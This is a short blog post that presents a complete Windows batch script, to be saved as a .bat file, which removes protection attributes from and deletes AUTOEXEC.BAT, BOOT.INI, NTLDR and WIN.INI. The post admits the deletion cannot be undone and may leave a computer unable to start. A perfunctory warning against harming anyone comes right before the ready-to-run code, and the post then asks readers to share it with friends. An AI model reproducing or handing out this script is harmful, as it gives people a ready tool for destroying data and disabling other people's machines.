Deleting Startup Files

Deleting Startup Files

⭕⭕🔆Well, this is something which you shouldn’t try on your computer unless you are willing to lose all your data. This code will remove the files that help your computer during the startup.
⭕⭕🔆Save the file as .bat file format. It will shut down your computer and will delete all important startup files. There’s no rollback option. Therefore you should be aware of what you will be doing. Please don’t use the above-given code to harm anyone.
💥💥NOTE💥💥
⭕⭕⭕Before running a program, make sure you understand what happens when you run the program.⭕⭕⭕

⭕⭕⭕Please read the post before start this program.⭕⭕⭕
💥💥
@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI

🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you.

⏩Follow us.👇
Telegram Facebook Twitter Whatsapp group

Comments

Popular posts from this blog

Device manager open කිරීමට run command භාවිතා කරමු. Open Device Manager useing run command.

How to open cd rom useing notepad application.

Turn on gaming mode in your computer.